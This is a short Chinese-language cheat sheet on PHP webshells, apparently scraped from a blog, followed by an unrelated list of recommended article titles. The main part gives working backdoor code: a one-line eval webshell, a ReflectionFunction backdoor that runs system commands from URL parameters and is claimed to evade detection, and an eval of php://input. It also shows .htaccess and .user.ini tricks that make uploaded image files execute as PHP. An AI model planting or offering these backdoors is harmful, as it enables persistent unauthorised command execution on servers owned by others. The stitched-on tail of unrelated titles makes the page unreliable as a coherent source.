一句话 and 大马

phpspy  菜刀一句话<?php @eval($_POST['cmd']);?>

反射后门

$func = new ReflectionFunction($_GET[m]);

echo $func->invokeArgs(array($_GET[c]));

?>

调用如x.php?m=system&c=whoami

后门也可绕过某些检测禁用system函数的防护系统

php:input

php://input是用来接收post数据(这里有php://input的介绍)

@eval(file_get_contents('php://input'))

?>

Post提交 system('whoami');

.htaccess(需webserver支持)

可以设置任意后缀也可以设置UTF7编码格式shell

AddType  application/x-httpd-php     .jpg

然后再传一个JPG结尾的shell,访问即可执行了

.user.ini(需fastcgi配合)

动态修改php.ini配置文件

User.ini

auto_prepend_file:指定在每个PHP页面执行前所要执行的代码

auto_prepend_file=demo.gif (每个页面都会加载demo.gif)

使用php://input (不需要上传额外的文件)(需要自行打开allow_url_include=on 默认为off)

缺点:不支持.user.ini修改allow_url_include (在PHP5时是PHP_INI_SYSTEM。 从PHP5.2.0起可用。)

http://php.net/manual/zh/ini.list.php

http://php.net/manual/zh/configuration.changes.modes.php

php隐藏后门,php后门隐藏技巧相关推荐

  1. lanker php 大码,松哥教你 隐藏PHP文件后门的技巧

    松哥教你 隐藏PHP文件后门的技巧 (2011-12-25 19:40:52) 标签: it 分类: php 要知道假如光把PHP语句放到图片里是无论如何也不能履行的,由于PHP只解析扩大名为php的 ...

  2. Intellij IDEA 那些隐藏好用的小技巧

    转载自 Intellij IDEA 那些隐藏好用的小技巧 概述 之前写了一篇介绍IntellIJ IDEA的文章< Intellij Idea非常6的10个姿势 >,主要是列出一些平时大家 ...

  3. PHP js 点击按钮 切换模版,javascript点击按钮实现隐藏显示切换效果_javascript技巧...

    本文实例分享了点击按钮实现隐藏和显示的切换代码,供大家参考,具体内容如下 效果图: 在不少应用中,都有这样的功能,点击同一个按钮可以实现一个元素的显示和隐藏的切换,下面就通过代码实例介绍一下如何实现此 ...

  4. mysql amd.dll 后门_DLL后门清除完全篇

    作者:dahubaobao [Nuke Group] 主页:http://www.ringz.org 团体站点:http://www.digitalnuke.com/main/ 邮件:dahushib ...

  5. 苹果手机怎么把游戏隐藏在计算机,苹果手机隐藏了游戏怎么找出来

    满意答案 gv1731 2016.07.30 采纳率:58%    等级:12 已帮助:5317人 击"应用程序"-- 选择"不允许应用程序"来隐藏所有从App ...

  6. iphone7计算机隐藏,iphone7十大隐藏功能

    iPad/iPhone中如何隐藏用户下载的应用 打开"设置", 选择"通用"-- 按照前面介绍的方法,启用"访问限制"--在"允许 ...

  7. 照片宽高比怎么设置_iPhone如何隐藏手机照片 iPhone隐藏照片步骤【方法详解】...

    iPhone怎么隐藏手机照片_iPhone隐藏照片方法 有时候我们的iPhone里放了一些比较隐私的照片,又不想给别人发现,特别是那些熊孩子.那么这时候我们应该怎么办呢?下面小编为大家介绍两种方法轻松 ...

  8. 计算机怎么查询隐藏的字体,如何隐藏电脑桌面图标下的文字

    这里为大家带来关于如何隐藏电脑桌面图标文字的技巧,通常我们电脑桌面中的软件图标下方都会有该软件的名称,当然这对于一些陌生的软件来说是比较有用的,可以让我快速的知道该软件的类型,但如果我们对于自己电脑上 ...

  9. 3389之永不查杀的后门shift后门代码

    永不查杀的3389后门其原理就是利用shift后门,连敲5次shift键既可以直接进入服务器. 前些天在群里有个小伙伴问了一句谁知道shift后门的代码,当时我给了他一个链接,我总是觉得这个百度下就能 ...

  10. java 覆盖和隐藏_Java覆盖和隐藏2

    先上题,题目如下,请分析输出结果: public class MainClass { public static void main(String[] args) { Fu f = new Zi(); ...

最新文章

  1. 原创 | 吐血推荐,B站最强学习资源汇总(数据科学,机器学习,python)
  2. svn冲突的解决办法
  3. 页面如何自动出现滚动条(overflow属性用法)
  4. 算法系列之赫夫曼编码实战一【数据压缩、数据解压】
  5. OpenCASCADE:使用扩展数据交换 XDE之剪裁平面
  6. 基于小程序的Token身份权限体系
  7. android从一点展开动画,Android自定义View——从零开始实现可展开收起的水平菜单栏...
  8. 【ASP.NET MVC 学习笔记】- 09 Area的使用
  9. dubbo k8s 服务发现_记一次dubbo服务发现导致的OOM
  10. StanfordDB class自学笔记 (九) Relational Design Theory 关系设计理论
  11. 中国的码农们,沉睡了20年,该醒醒了
  12. 金三银四,冰河为你整理了这份20万字134页的面试圣经!!
  13. onenote无法同步的原因E0000007 b4lka
  14. 深入理解CSS动画animation
  15. BT06串口蓝牙模块的配置以及与电脑的配对
  16. dblp搜文献时各颜色含义
  17. 手机照片局部放大镜_如何为不识字的老年人挑选一款合适的智能手机
  18. 人工智能——背景知识、知识体系、应用领域
  19. weblogic的集群与配置--架构师第九天
  20. “浏览器设置从上次停下的地方继续,但是电脑重启打开后还是主页”问题的解决办法

热门文章

  1. 七千字的线性回归模型指南,建议收藏!
  2. gradient_accumulation_steps --梯度累加理解
  3. 学校计算机考试插u盘,一种带USB插头的计算机考试防U盘作弊装置的制作方法
  4. 福师《大学摄影》在线作业一、二
  5. 个人网上银行常见问题
  6. java i18n utf_struts2.0乱码 在struts.xml里面设置struts.i18n.encoding=utf-8依然出现乱码是怎么回事呀...
  7. Docker基础篇 - (六)Docker 网络Spring Boot微服务打包Docker镜像
  8. hydrus1d使用说明_Hydrus-1D中文说明.doc
  9. HTML5的内容模型及页面结构图
  10. 【弄nèng - Activiti6】Activiti6入门篇(十九)—— 结束事件